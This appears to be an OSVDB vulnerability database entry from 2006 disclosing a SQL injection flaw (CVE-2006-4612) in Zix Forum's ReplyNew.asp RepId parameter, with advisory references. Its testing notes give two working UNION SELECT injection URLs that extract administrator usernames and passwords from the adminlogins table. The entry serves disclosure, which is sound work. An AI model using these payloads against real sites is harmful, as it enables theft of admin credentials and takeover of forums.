Zix Forum ReplyNew.asp RepId Variable SQL Injection

2006-09-05T06:48:53
ID OSVDB:28569
Type osvdb
Reporter OSVDB
Modified 2006-09-05T06:48:53

Description

Manual Testing Notes

http://[target]/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins

http://[target]/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins

References:

Secunia Advisory ID:21766 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0045.html FrSIRT Advisory: ADV-2006-3476 CVE-2006-4612 Bugtraq ID: 19855